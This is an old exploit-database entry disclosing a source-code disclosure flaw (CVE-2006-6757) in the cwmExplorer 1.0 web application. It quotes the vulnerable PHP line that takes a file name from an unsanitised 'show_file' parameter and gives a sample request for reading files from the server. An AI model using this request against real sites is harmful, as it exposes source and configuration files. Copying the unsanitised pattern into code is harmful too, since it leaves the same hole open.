cwmExplorer 1.0 show_file Source Code Disclosure Vulnerability

2006-12-19T00:00:00
ID EDB-ID:2963
Type exploitdb
Reporter ajann
Modified 2006-12-19T00:00:00

Description

cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability. CVE-2006-6757. Webapps exploit for asp platform

                                        
                                            *******************************************************************************************
# Title   :  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
$datei = "dirs/".$d."/".$_GET[show_file];
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/index.php?d=0&show_file=[file]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-19]